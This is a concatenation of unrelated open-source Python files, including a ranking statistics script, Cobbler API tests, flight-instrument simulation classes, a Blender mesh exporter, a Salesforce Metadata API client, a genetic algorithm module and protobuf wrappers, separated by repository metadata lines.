from lib import * import re from globfilerank import * def obs(f,alli): now = alli line = f.readline() while(line): lst = line.split() for i in lst: isitnum = re.match('^([^0-9]|\.)',i) if isitnum: now = i else: v = float(i) inc(v,now) inc(v,alli) line = f.readline() for i in name: if i != alli: temp = {} temp["="] = i temp["x"] = mu[i] order.append(temp) def inc(v,k): if k not in name: name.append(k) label[k] = 0 try: n[k] += 1 except KeyError: n[k] = 1 alli = n[k] try: x[k][alli] = v except KeyError: x[k] = {} x[k][alli] = v try: sumi[k] += v except KeyError: sumi[k] = v try: delta = v - mu[k] except KeyError: mu[k] = 0 delta = v - mu[k] try: mu[k] += delta/alli except KeyError: mu[k] = delta/alli try: m2[k] += delta*(v - mu[k]) except KeyError: m2[k] = delta*(v - mu[k]) var[k] = m2[k]/(alli - 1 + PINCH) def rank(alli,cohen,mittas,a12): cohen = cohen*(var[alli])**0.5 level = 0 total = n[alli] rdiv(0,len(order)-1,1,cohen,mittas,a12,level) def rdiv(low,high,c,cohen,mittas,a12,level): cut = div(low,high,cohen,mittas,a12) if cut: level += 1 c = rdiv(low,cut-1,c,cohen,mittas,a12,level) + 1 c = rdiv(cut,high,c,cohen,mittas,a12,level) else: for i in range(low,high+1): label[order[i]["="]] = c return c def div(low,high,cohen,mittas,a12): n0 = [0 for i in range(0,len(order))] n1 = [0 for i in range(0,len(order))] sum0 = [0 for i in range(0,len(order))] sum1 = [0 for i in range(0,len(order))] muAll = divInits(low,high,n0,n1,sum0,sum1) maxi = -1 cut = 0 for i in range(low,high): b = order[i]["="] n0[i] = n0[i-1] + n[b] sum0[i] = sum0[i-1] + sumi[b] left = n0[i] muLeft = sum0[i] / left right = n1[i] muRight = sum1[i] / right e = errDiff(muAll,left,muLeft,right,muRight) if cohen: if abs(muLeft - muRight) <= cohen: continue if mittas: if e < maxi: continue if a12: if bigger(low,i,high) < a12: continue maxi = e cut = i return cut def errDiff(mu,n0,mu0,n1,mu1): return n0*(mu - mu0)**2 + n1*(mu - mu1)**2 def divInits(low,high,n0,n1,sum0,sum1): b= order[low]["="] n0[low]= n[b] sum0[low]= sumi[b] b= order[high]["="] n1[high]= n[b] sum1[high]= sumi[b] for i in range(high-1,low-1,-1): b = order[i]["="] n1[i] = n1[i+1] + n[b] sum1[i] = sum1[i+1] + sumi[b] return sum1[low+1]/n1[low+1] def bigger(low,mid,high): below = values(low,mid-1) above = values(mid,high) return a12statistic(below,above) def a12statistic(below,above): more = 0 same = 0 comparisons = 1 for j in range(0,len(above)): for i in range(0,len(below)): comparisons += 1 more += 1 if above[j] > below[i] else 0 same += 1 if above[j] == below[i] else 0 return (more + 0.5*same)/comparisons def values(i,j): out = [] for k in range(i,j): b = order[k]["="] for key in x[b]: out.append(x[b][key]) return out def ranks(f,cohens,mittas,a12): print "\n----|,",f.name,"|------------------" obs(f,0) rank(0,cohens,mittas,a12) maxi = len(order) for i in range(0,maxi): k = order[i]["="] print k,":mu",mu[k],":rank",label[k] f = open('../data/ska.txt','r') ranks(f,0.3,1,0.6) f.close()
gpl-2.0
-2,870,331,426,623,933,000
23.988235
66
0.476695
false
2.776471
false
false
false
cobbler/cobbler
tests/xmlrpcapi/image_test.py
1
2527
import pytest # TODO: Create fixture where image is created @pytest.fixture(scope="function") def remove_item(remote, token): """ Remove an item with the given name. :param token: The fixture to have the token for authenticated strings available. :param remote: The fixture to have the base xmlrpc connection. """ def _remove_item(itemtype, name): return remote.remove_item(itemtype, name, token) return _remove_item @pytest.mark.usefixtures("cobbler_xmlrpc_base") class TestImage: def test_create_image(self, remote, token): """ Test: create/edit of an image object""" # Arrange # Act images = remote.get_images(token) image = remote.new_image(token) # Assert assert remote.modify_image(image, "name", "testimage0", token) assert remote.save_image(image, token) new_images = remote.get_images(token) assert len(new_images) == len(images) + 1 def test_get_images(self, remote): """ Test: get images """ # Arrange # Act remote.get_images() # Assert def test_get_image(self, remote): """ Test: Get an image object """ # Arrange # Act # Assert image = remote.get_image("testimage0") def test_find_image(self, remote, token): """ Test: Find an image object """ # Arrange # Act result = remote.find_image({"name": "testimage0"}, token) # Assert assert result def test_copy_image(self, remote, token): """ Test: Copy an image object """ # Arrange # Act image = remote.get_item_handle("image", "testimage0", token) # Assert assert remote.copy_image(image, "testimagecopy", token) def test_rename_image(self, remote, token, remove_item): """ Test: Rename an image object """ # Arrange name = "testimage1" image = remote.get_item_handle("image", "testimagecopy", token) # Act result = remote.rename_image(image, name, token) # Cleanup remote.remove_item("image", name, token) # Assert assert result def test_remove_image(self, remote, token): """ Test: remove an image object """ # Arrange # Act # Assert assert remote.remove_image("testimage0", token)
gpl-2.0
-5,530,098,281,154,148,000
20.973913
84
0.557974
false
4.108943
true
false
false
pmatigakis/Huginn
huginn/instruments.py
1
6186
""" The hugin.instruments module contains classes that simulate the aircraft's instruments """ import math from math import sqrt, log from huginn.fdm import Position, Velocities, Atmosphere, Orientation from huginn.constants import a0, T0, g, M, R from huginn.unit_conversions import convert_jsbsim_pressure, ur def true_airspeed(total_pressure, static_pressure, temperature): """Calculate the true airspeed Arguments: total_pressure: the total pressure in Pascal static_pressure: the static pressure in Pascal temperature: the temperature in kelvin returns the airspeed in knots """ impact_pressure = total_pressure - static_pressure t_t0 = temperature / T0 q_p = impact_pressure / static_pressure return a0 * sqrt(5.0 * (math.pow(q_p + 1.0, 2.0/7.0) - 1.0) * t_t0) def pressure_altitude(sea_level_pressure, pressure, temperature): """Calculate the pressure altitude Arguments: sea_level_pressure: the pressure at sea level in Pascal pressure: the pressure at the current altitude in Pascal temperature: the temperature in Kelvin """ return log(sea_level_pressure/pressure) * ((R * temperature) / (g * M)) class GPS(object): """The GPS class simulates the aircraft's GPS system.""" def __init__(self, fdmexec): self.fdmexec = fdmexec self._position = Position(fdmexec) self._velocities = Velocities(fdmexec) @property def latitude(self): """Returns the latitude in degrees""" return self._position.latitude @property def longitude(self): """Returns the longitude in degrees""" return self._position.longitude @property def altitude(self): """Returns the altitude in meters""" return self._position.altitude @property def airspeed(self): """Returns the airspeed in meters per second""" return self._velocities.true_airspeed @property def heading(self): """Returns the heading in degrees""" return self._position.heading class AirspeedIndicator(object): """The AirspeedIndicator class simulates the aircraft airspeed indicator""" def __init__(self, fdmexec): """Create a new AirspeedIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._atmosphere = Atmosphere(fdmexec) @property def airspeed(self): """Returns the airspeed in knots""" total_pressure = self.fdmexec.GetAuxiliary().GetTotalPressure() total_pressure = convert_jsbsim_pressure(total_pressure) return true_airspeed(total_pressure, self._atmosphere.pressure, self._atmosphere.temperature) class Altimeter(object): """The Altimeter class simulates the aircraft altimeter""" def __init__(self, fdmexec): """Create a new Altimeter object Arguments: fdmexec: A JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._atmosphere = Atmosphere(fdmexec) self._pressure = 29.92130302799185 * ur.in_Hg @property def altitude(self): """Return the altitude in feet""" sea_level_pressure = self._pressure.to(ur.pascal) altitude = pressure_altitude(sea_level_pressure.magnitude, self._atmosphere.pressure, self._atmosphere.temperature) altitude = altitude * ur.meter altitude.ito(ur.foot) return altitude.magnitude @property def pressure(self): """Return the instrument's pressure setting in inHg""" return self._pressure.magnitude @pressure.setter def pressure(self, value): """Set the instrument's pressure setting Arguments: value: the pressure in inHg """ self._pressure = value * ur.in_Hg class AttitudeIndicator(object): """The AttitudeIndicator class simulates the attitude indicator instrument""" def __init__(self, fdmexec): """Create a new AttitudeIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec 
self._orientation = Orientation(fdmexec) @property def roll(self): """Return the roll angle in degrees""" return self._orientation.phi @property def pitch(self): """Return the pitch angle in degrees""" return self._orientation.theta class HeadingIndicator(object): """The HeadingIndicator class simulates the heading indicator instrument""" def __init__(self, fdmexec): """Create a new HeadingIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._orientation = Orientation(fdmexec) @property def heading(self): """Return the heading in degrees""" return self._orientation.psi class VerticalSpeedIndicator(object): """The VerticalSpeedIndicator simulates the aircraft's vertical speed indicator instrument""" def __init__(self, fdmexec): """Create a new VerticalSpeedIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._velocities = Velocities(fdmexec) @property def climb_rate(self): """Return the climb rate in feet per minute""" climb_rate = self._velocities.climb_rate * ur.meters_per_second climb_rate.ito(ur.feet_per_minute) return climb_rate.magnitude class Instruments(object): """The Instruments class contains the instances of the aircraft's instruments""" def __init__(self, fdmexec): self.fdmexec = fdmexec self.gps = GPS(fdmexec) self.airspeed_indicator = AirspeedIndicator(fdmexec) self.altimeter = Altimeter(fdmexec) self.attitude_indicator = AttitudeIndicator(fdmexec) self.heading_indicator = HeadingIndicator(fdmexec) self.vertical_speed_indicator = VerticalSpeedIndicator(fdmexec)
bsd-3-clause
6,210,240,152,551,229,000
27.506912
75
0.642903
false
3.985825
false
false
false
satishgoda/programmingusingpython
sandbox/rhomStub/randd/uv_master.py
1
6009
import bpy # Get a handle to the active object object = bpy.context.active_object # If the object is in edit mode, come out of it if object.mode == 'EDIT': bpy.ops.object.mode_set(mode='OBJECT', toggle=True) # Get a handle to the active object's mesh data bmesh = object.data ######################################################################################### class ProcessBMeshForrhom(object): '''This class takes as input a Blender Mesh and creates an IR (Intermediate Representation) to be used by rhom. Processing includes figuring out group membership of polygons, removing redundant data in Blender's uv point tables. Apart from the processing, this class provides a clean API to be used by the exporter.''' def __init__(self, mesh): self._export_mesh = {} # MasterDict export_mesh = {} # this will be used to hash the uv's when processing the polygons one by one. # Information from here is used to update polygons and uv_layers # Can be deleted once pre-processing is done export_mesh['vertices'] = { v.index: { uvlayer.name: {} for uvlayer in bmesh.uv_layers } for v in bmesh.vertices } # Unique uvs as a result of pre-processing the polygons export_mesh['uv_layers'] = { uvlayer.name: { 'uvindex': 0, 'table': []} for uvlayer in bmesh.uv_layers } # This will hold the vertices and uv indices for all the polygons # as part of the pre-processing export_mesh['polygons'] = { p.index: { 'vertices': {'no': -1, 'array': ''}, 'uvlayers': {uvlayer.name: '' for uvlayer in bmesh.uv_layers}, 'groups': [], } for p in bmesh.polygons } # This data is used by the per polygon pre-processing step to figure out group membership export_mesh['groups'] = {'names': [group_name for group_name in sorted(bmesh.polygon_layers_int.keys())], 'table': {p.index: [] for p in bmesh.polygons} } for polygon in bmesh.polygons: for group_name in export_mesh['groups']['names']: export_mesh['groups']['table'][polygon.index].append(bool(bmesh.polygon_layers_int[group_name].data[polygon.index].value)) ####################### Start Pre-Processing ######################## def process_uv_layer(polygon, layer, export_mesh): uvtag = layer.name uvdata = layer.data uv_layer = export_mesh['uv_layers'][uvtag] uvindices = [] for vindex in polygon.vertices: # Get the uv value corresponding to this vertex uv = uvdata[uv_layer['uvindex']].uv.to_tuple() # Is this a new uv coming in? if export_mesh['vertices'][vindex][uvtag].get(uv) is None: # Get the index from master uv table index = len(export_mesh['uv_layers'][uvtag]['table']) # Insert into the master uv table export_mesh['uv_layers'][uvtag]['table'].append(uv) # Log the uv in the vertices hash, so that when a shared uv comes by, we can just use this export_mesh['vertices'][vindex][uvtag][uv] = index else: # This uv is shared, so reuse the index index = export_mesh['vertices'][vindex][uvtag][uv] # Add to the polygons master uv index uvindices.append(index) # Ready to fetch the next raw uv uv_layer['uvindex'] += 1 # Store the uv index loop as a ready to use list for rhom export_mesh['polygons'][polygon.index]['uvlayers'][uvtag] = '{0}'.format(str(uvindices)) # Group membership data for each polygon def process_group_membership(polygon, export_mesh): polygon_groups = export_mesh['polygons'][polygon.index]['groups'] groups_table = export_mesh['groups']['table'] groups_names = export_mesh['groups']['names'] for (group_index, is_present) in enumerate(groups_table[polygon.index]): if is_present: polygon_groups.append(groups_names[group_index]) # PRE PROCESSING OF THE MESH for polygon in bmesh.polygons: # This data
will be used for generating the Vertex Table vertices = export_mesh['polygons'][polygon.index]['vertices'] vertices['no'] = len(polygon.vertices) vertices['array'] = '{0}'.format(str(list(polygon.vertices))) for layer in bmesh.uv_layers: process_uv_layer(polygon, layer, export_mesh) process_group_membership(polygon, export_mesh) ####################### End Pre-Processing ########################### #from pprint import pprint #pprint(export_mesh) #################### Use rhom Stub to Create Obn ################## if not False: import sys sys.path.append('/muse/satishg/learning/soc/obnblender/blender/io_scene_obn') import rhomstub as rhom mesh = rhom.Mesh() for vertex in bmesh.vertices: x, y, z = vertex.co mesh.addPoint(rhom.Point(x, y, z)) for uvtag in export_mesh['uv_layers'].keys(): for uv in export_mesh['uv_layers'][uvtag]['table']: mesh.addTexCoord(uvtag, rhom.TexCoord(uv[0], uv[1])) for group_name in export_mesh['groups']['names']: mesh.addGroup(group_name) for polygon_index, polygon in export_mesh['polygons'].items(): element = mesh.addElement(polygon['vertices']['no']) mesh.setPointIndices(element, polygon['vertices']['array']) for uvtag in export_mesh['uv_layers']: mesh.setTexCoordIndices(uvtag, element, polygon['uvlayers'][uvtag]) for group_name in polygon['groups']: mesh.addElementToGroup(mesh.getElement(polygon_index), group_name) if group_name.endswith('Mtl'): mesh.setMaterial(mesh.getElement(polygon_index), 'xxx_' + group_name) rhom.writeMesh('Foo.obn', mesh)
gpl-2.0
9,153,331,899,270,852,000
39.601351
130
0.59128
false
3.942913
false
false
false
rbauction/sfdclib
sfdclib/metadata.py
1
10823
""" Class to work with Salesforce Metadata API """ from base64 import b64encode, b64decode from xml.etree import ElementTree as ET import sfdclib.messages as msg class SfdcMetadataApi: """ Class to work with Salesforce Metadata API """ _METADATA_API_BASE_URI = "/services/Soap/m/{version}" _XML_NAMESPACES = { 'soapenv': 'http://schemas.xmlsoap.org/soap/envelope/', 'mt': 'http://soap.sforce.com/2006/04/metadata' } def __init__(self, session): if not session.is_connected(): raise Exception("Session must be connected prior to instantiating this class") self._session = session self._deploy_zip = None def _get_api_url(self): return "%s%s" % ( self._session.get_server_url(), self._METADATA_API_BASE_URI.format(**{'version': self._session.get_api_version()})) def deploy(self, zipfile, options): """ Kicks off async deployment, returns deployment id """ check_only = "" if 'checkonly' in options: check_only = "<met:checkOnly>%s</met:checkOnly>" % options['checkonly'] test_level = "" if 'testlevel' in options: test_level = "<met:testLevel>%s</met:testLevel>" % options['testlevel'] tests_tag = "" if 'tests' in options: for test in options['tests']: tests_tag += "<met:runTests>%s</met:runTests>\n" % test attributes = { 'client': 'Metahelper', 'checkOnly': check_only, 'sessionId': self._session.get_session_id(), 'ZipFile': self._read_deploy_zip(zipfile), 'testLevel': test_level, 'tests': tests_tag } request = msg.DEPLOY_MSG.format(**attributes) headers = {'Content-type': 'text/xml', 'SOAPAction': 'deploy'} res = self._session.post(self._get_api_url(), headers=headers, data=request) if res.status_code != 200: raise Exception( "Request failed with %d code and error [%s]" % (res.status_code, res.text)) async_process_id = ET.fromstring(res.text).find( 'soapenv:Body/mt:deployResponse/mt:result/mt:id', self._XML_NAMESPACES).text state = ET.fromstring(res.text).find( 'soapenv:Body/mt:deployResponse/mt:result/mt:state', self._XML_NAMESPACES).text return async_process_id, state @staticmethod def _read_deploy_zip(zipfile): if hasattr(zipfile, 'read'): file = zipfile file.seek(0) should_close = False else: file = open(zipfile, 'rb') should_close = True raw = file.read() if should_close: file.close() return b64encode(raw).decode("utf-8") def _retrieve_deploy_result(self, async_process_id): """ Retrieves status for specified deployment id """ attributes = { 'client': 'Metahelper', 'sessionId': self._session.get_session_id(), 'asyncProcessId': async_process_id, 'includeDetails': 'true' } mt_request = msg.CHECK_DEPLOY_STATUS_MSG.format(**attributes) headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkDeployStatus'} res = self._session.post(self._get_api_url(), headers=headers, data=mt_request) root = ET.fromstring(res.text) result = root.find( 'soapenv:Body/mt:checkDeployStatusResponse/mt:result', self._XML_NAMESPACES) if result is None: raise Exception("Result node could not be found: %s" % res.text) return result def check_deploy_status(self, async_process_id): """ Checks whether deployment succeeded """ result = self._retrieve_deploy_result(async_process_id) state = result.find('mt:status', self._XML_NAMESPACES).text state_detail = result.find('mt:stateDetail', self._XML_NAMESPACES) if state_detail is not None: state_detail = state_detail.text unit_test_errors = [] deployment_errors = [] if state == 'Failed': # Deployment failures failures = result.findall('mt:details/mt:componentFailures', self._XML_NAMESPACES) for failure in failures: deployment_errors.append({ 'type': failure.find('mt:componentType', 
self._XML_NAMESPACES).text, 'file': failure.find('mt:fileName', self._XML_NAMESPACES).text, 'status': failure.find('mt:problemType', self._XML_NAMESPACES).text, 'message': failure.find('mt:problem', self._XML_NAMESPACES).text }) # Unit test failures failures = result.findall( 'mt:details/mt:runTestResult/mt:failures', self._XML_NAMESPACES) for failure in failures: unit_test_errors.append({ 'class': failure.find('mt:name', self._XML_NAMESPACES).text, 'method': failure.find('mt:methodName', self._XML_NAMESPACES).text, 'message': failure.find('mt:message', self._XML_NAMESPACES).text, 'stack_trace': failure.find('mt:stackTrace', self._XML_NAMESPACES).text }) deployment_detail = { 'total_count': result.find('mt:numberComponentsTotal', self._XML_NAMESPACES).text, 'failed_count': result.find('mt:numberComponentErrors', self._XML_NAMESPACES).text, 'deployed_count': result.find('mt:numberComponentsDeployed', self._XML_NAMESPACES).text, 'errors': deployment_errors } unit_test_detail = { 'total_count': result.find('mt:numberTestsTotal', self._XML_NAMESPACES).text, 'failed_count': result.find('mt:numberTestErrors', self._XML_NAMESPACES).text, 'completed_count': result.find('mt:numberTestsCompleted', self._XML_NAMESPACES).text, 'errors': unit_test_errors } return state, state_detail, deployment_detail, unit_test_detail def download_unit_test_logs(self, async_process_id): """ Downloads Apex logs for unit tests executed during specified deployment """ result = self._retrieve_deploy_result(async_process_id) print("Results: %s" % ET.tostring(result, encoding="us-ascii", method="xml")) def retrieve(self, options): """ Submits retrieve request """ # Compose unpackaged XML unpackaged = '' for metadata_type in options['unpackaged']: members = options['unpackaged'][metadata_type] unpackaged += '<types>' for member in members: unpackaged += '<members>{0}</members>'.format(member) unpackaged += '<name>{0}</name></types>'.format(metadata_type) # Compose retrieve request XML attributes = { 'client': 'Metahelper', 'sessionId': self._session.get_session_id(), 'apiVersion': self._session.get_api_version(), 'singlePackage': options['single_package'], 'unpackaged': unpackaged } request = msg.RETRIEVE_MSG.format(**attributes) # Submit request headers = {'Content-type': 'text/xml', 'SOAPAction': 'retrieve'} res = self._session.post(self._get_api_url(), headers=headers, data=request) if res.status_code != 200: raise Exception( "Request failed with %d code and error [%s]" % (res.status_code, res.text)) # Parse results to get async Id and status async_process_id = ET.fromstring(res.text).find( 'soapenv:Body/mt:retrieveResponse/mt:result/mt:id', self._XML_NAMESPACES).text state = ET.fromstring(res.text).find( 'soapenv:Body/mt:retrieveResponse/mt:result/mt:state', self._XML_NAMESPACES).text return async_process_id, state def _retrieve_retrieve_result(self, async_process_id, include_zip): """ Retrieves status for specified retrieval id """ attributes = { 'client': 'Metahelper', 'sessionId': self._session.get_session_id(), 'asyncProcessId': async_process_id, 'includeZip': include_zip } mt_request = msg.CHECK_RETRIEVE_STATUS_MSG.format(**attributes) headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkRetrieveStatus'} res = self._session.post(self._get_api_url(), headers=headers, data=mt_request) root = ET.fromstring(res.text) result = root.find( 'soapenv:Body/mt:checkRetrieveStatusResponse/mt:result', self._XML_NAMESPACES) if result is None: raise Exception("Result node could not be found: %s" % res.text) return result def 
retrieve_zip(self, async_process_id): """ Retrieves ZIP file """ result = self._retrieve_retrieve_result(async_process_id, 'true') state = result.find('mt:status', self._XML_NAMESPACES).text error_message = result.find('mt:errorMessage', self._XML_NAMESPACES) if error_message is not None: error_message = error_message.text # Check if there are any messages messages = [] message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES) for message in message_list: messages.append({ 'file': message.find('mt:fileName', self._XML_NAMESPACES).text, 'message': message.find('mt:problem', self._XML_NAMESPACES).text }) # Retrieve base64 encoded ZIP file zipfile_base64 = result.find('mt:zipFile', self._XML_NAMESPACES).text zipfile = b64decode(zipfile_base64) return state, error_message, messages, zipfile def check_retrieve_status(self, async_process_id): """ Checks whether retrieval succeeded """ result = self._retrieve_retrieve_result(async_process_id, 'false') state = result.find('mt:status', self._XML_NAMESPACES).text error_message = result.find('mt:errorMessage', self._XML_NAMESPACES) if error_message is not None: error_message = error_message.text # Check if there are any messages messages = [] message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES) for message in message_list: messages.append({ 'file': message.find('mt:fileName', self._XML_NAMESPACES).text, 'message': message.find('mt:problem', self._XML_NAMESPACES).text }) return state, error_message, messages
mit
-2,345,350,160,945,566,700
42.119522
100
0.588931
false
3.990782
true
false
false
bema-ligo/pycbc
pycbc/inference/sampler.py
1
1386
# Copyright (C) 2016 Christopher M. Biwer # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 3 of the License, or (at your # option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General # Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ============================================================================= # # Preamble # # ============================================================================= # """ This modules provides a list of implemented samplers for parameter estimation. """ import numpy from pycbc.inference.sampler_kombine import KombineSampler from pycbc.inference.sampler_emcee import EmceeEnsembleSampler, EmceePTSampler # list of available samplers samplers = { KombineSampler.name : KombineSampler, EmceeEnsembleSampler.name : EmceeEnsembleSampler, EmceePTSampler.name : EmceePTSampler, }
gpl-3.0
3,212,687,464,336,453,600
36.459459
79
0.664502
false
4.291022
false
false
false
handcraftsman/GeneticAlgorithmsWithPython
es/ch03/genetic.py
1
3034
# File: genetic.py # From Chapter 3 of _Algoritmos Genéticos con Python_ # # Author: Clinton Sheppard <fluentcoder@gmail.com> # Copyright (c) 2017 Clinton Sheppard # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. See the License for the specific language governing # permissions and limitations under the License. import random import statistics import sys import time def _generar_padre(longitud, geneSet, obtener_aptitud): genes = [] while len(genes) < longitud: tamañoMuestral = min(longitud - len(genes), len(geneSet)) genes.extend(random.sample(geneSet, tamañoMuestral)) aptitud = obtener_aptitud(genes) return Cromosoma(genes, aptitud) def _mutar(padre, geneSet, obtener_aptitud): genesDelNiño = padre.Genes[:] índice = random.randrange(0, len(padre.Genes)) nuevoGen, alterno = random.sample(geneSet, 2) genesDelNiño[índice] = alterno if nuevoGen == genesDelNiño[ índice] else nuevoGen aptitud = obtener_aptitud(genesDelNiño) return Cromosoma(genesDelNiño, aptitud) def obtener_mejor(obtener_aptitud, longitudObjetivo, aptitudÓptima, geneSet, mostrar): random.seed() def fnMutar(padre): return _mutar(padre, geneSet, obtener_aptitud) def fnGenerarPadre(): return _generar_padre(longitudObjetivo, geneSet, obtener_aptitud) for mejora in _obtener_mejoras(fnMutar, fnGenerarPadre): mostrar(mejora) if not aptitudÓptima > mejora.Aptitud: return mejora def _obtener_mejoras(nuevo_niño, generar_padre): mejorPadre = generar_padre() yield mejorPadre while True: niño = nuevo_niño(mejorPadre) if mejorPadre.Aptitud > niño.Aptitud: continue if not niño.Aptitud > mejorPadre.Aptitud: mejorPadre = niño continue yield niño mejorPadre = niño class Cromosoma: def __init__(self, genes, aptitud): self.Genes = genes self.Aptitud = aptitud class Comparar: @staticmethod def ejecutar(función): cronometrajes = [] stdout = sys.stdout for i in range(100): sys.stdout = None horaInicio = time.time() función() segundos = time.time() - horaInicio sys.stdout = stdout cronometrajes.append(segundos) promedio = statistics.mean(cronometrajes) if i < 10 or i % 10 == 9: print("{} {:3.2f} {:3.2f}".format( 1 + i, promedio, statistics.stdev(cronometrajes, promedio) if i > 1 else 0))
apache-2.0
243,886,378,590,808,930
30.684211
79
0.652492
false
3.013013
false
false
false
basilhskk/ergasies
ergasia8.py
1
1425
# imports import tweepy from tweepy import OAuthHandler # keys ckey='...' csecret='...' atoken='...' asecret='...' # error handling: Twitter only allows fetching 5000 follower IDs at a time try: auth = OAuthHandler(ckey, csecret) auth.set_access_token(atoken, asecret) api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True) # finding the users' IDs user1=raw_input("Give the first name: ") user2=raw_input("Give the second name: ") user=api.get_user(user1) userid1=user.id user=api.get_user(user2) userid2=user.id # collecting user1's followers fuser1 = tweepy.Cursor(api.followers_ids, id = userid1) ids1=[] for page in fuser1.pages(): ids1.extend(page) # collecting user2's followers ids2=[] fuser2 = tweepy.Cursor(api.followers_ids, id = userid2) for page in fuser2.pages(): ids2.extend(page) except BaseException, e: print "Error",str(e) # finding the mutual followers mids=[] for i in range(0,len(ids1)): if ids1[i] in ids2: u= api.get_user(ids1[i]) mids.append(u.screen_name) # printing the final results if len(mids)==0: print user1,"and",user2,"have no mutual followers." elif len(mids)==1: print "The mutual follower of",user1,"and",user2,"is:" ,[item.encode('utf-8') for item in mids] else: print "The mutual followers of",user1,"and",user2,"are:" ,[item.encode('utf-8') for item in mids]
gpl-3.0
-8,160,394,223,410,080,000
29.978261
101
0.669474
false
2.896341
false
false
false
jimzhan/pyx
rex/core/fs.py
1
4479
# -*- coding: utf-8 -*- """ Functions that interact with local file system. """ from __future__ import with_statement import os import shutil import logging import itertools from rex.core import regex logger = logging.getLogger(__name__) #========================================================================================== # General/Common Properties #========================================================================================== sysroot = os.path.abspath('/') userdir = os.path.expanduser('~') def realpath(path): """ Create the real absolute path for the given path. Adds support for the '~' (user directory) and '/' (system root) shortcuts. Args: * path: pathname to use for realpath. Returns: Platform independent real absolute path. """ if path == '~': return userdir if path == '/': return sysroot if path.startswith('/'): return os.path.abspath(path) if path.startswith('~/'): return os.path.expanduser(path) if path.startswith('./'): return os.path.abspath(os.path.join(os.path.curdir, path[2:])) return os.path.abspath(path) def find(pattern, path=os.path.curdir, recursive=False): """ Find absolute file/folder paths with the given ``re`` pattern. Args: * pattern: search pattern, support both string (exact match) and `re` pattern. * path: root path to start searching, default is current working directory. * recursive: whether to recursively find the matched items from `path`, False by default Returns: Generator of the matched items of Files/Folders. """ root = realpath(path) Finder = lambda item: regex.is_regex(pattern) \ and pattern.match(item) or (pattern == item) if recursive: for base, dirs, files in os.walk(root, topdown=True): for segment in itertools.chain(filter(Finder, files), filter(Finder, dirs)): yield FS(os.path.join(base, segment)) else: for segment in filter(Finder, os.listdir(root)): yield FS(os.path.join(root, segment)) class FS(object): """ Generic file system object. Attributes: * path: absolute path of the file system object. """ def __init__(self, path, *args, **kwargs): self.path = realpath(path) def __unicode__(self): return self.path def __repr__(self): return self.path @property def exists(self): return os.path.exists(self.path) @property def name(self): return os.path.basename(self.path) def copy(self, dest): """ Copy item to the given `dest` path. Args: * dest: destination path to copy. """ if os.path.isfile(self.path): shutil.copy2(self.path, dest) else: shutil.copytree(self.path, dest, symlinks=False, ignore=None) def create(self): """ Create item under file system with its path. Returns: True if its path does not exist, False otherwise. """ if os.path.isfile(self.path): if not os.path.exists(self.path): with open(self.path, 'w') as fileobj: fileobj.write('') else: os.makedirs(self.path) def delete(self): """ Delete the file/folder itself from file system. """ if os.path.isfile(self.path): os.remove(self.path) else: shutil.rmtree(self.path) def move(self, dest): """ Move item to the given `dest` path. Args: * dest: destination path to move. """ shutil.move(self.path, dest) def flush(self): """ Commit the marked action, against `revert`. """ raise NotImplementedError def revert(self): """ Revert the last action. """ raise NotImplementedError class File(FS): def create(self): """ Create item under file system with its path. Returns: True if its path does not exist, False otherwise. """ if not os.path.exists(self.path): with open(self.path, 'w') as fileobj: fileobj.write('') class Folder(FS): def create(self): """ Recursively create the folder using its path. """ os.makedirs(self.path)
apache-2.0
-6,516,505,945,339,783,000
21.852041
96
0.546997
false
4.335915
false
false
false
chengsoonong/acton
acton/proto/wrappers.py
1
16442
"""Classes that wrap protobufs.""" import json from typing import Union, List, Iterable import acton.database import acton.proto.acton_pb2 as acton_pb import acton.proto.io import google.protobuf.json_format as json_format import numpy import sklearn.preprocessing from sklearn.preprocessing import LabelEncoder as SKLabelEncoder def validate_db(db: acton_pb.Database): """Validates a Database proto. Parameters ---------- db Database to validate. Raises ------ ValueError """ if db.class_name not in acton.database.DATABASES: raise ValueError('Invalid database class name: {}'.format( db.class_name)) if not db.path: raise ValueError('Must specify db.path.') def deserialise_encoder( encoder: acton_pb.Database.LabelEncoder ) -> sklearn.preprocessing.LabelEncoder: """Deserialises a LabelEncoder protobuf. Parameters ---------- encoder LabelEncoder protobuf. Returns ------- sklearn.preprocessing.LabelEncoder LabelEncoder (or None if no encodings were specified). """ encodings = [] for encoding in encoder.encoding: encodings.append((encoding.class_int, encoding.class_label)) encodings.sort() encodings = numpy.array([c[1] for c in encodings]) encoder = SKLabelEncoder() encoder.classes_ = encodings return encoder class LabelPool(object): """Wrapper for the LabelPool protobuf. Attributes ---------- proto : acton_pb.LabelPool Protobuf representing the label pool. db_kwargs : dict Key-value pairs of keyword arguments for the database constructor. label_encoder : sklearn.preprocessing.LabelEncoder Encodes labels as integers. May be None. """ def __init__(self, proto: Union[str, acton_pb.LabelPool]): """ Parameters ---------- proto Path to .proto file, or raw protobuf itself. """ try: self.proto = acton.proto.io.read_proto(proto, acton_pb.LabelPool) except TypeError: if isinstance(proto, acton_pb.LabelPool): self.proto = proto else: raise TypeError('proto should be str or LabelPool protobuf.') self._validate_proto() self.db_kwargs = {kwa.key: json.loads(kwa.value) for kwa in self.proto.db.kwarg} if 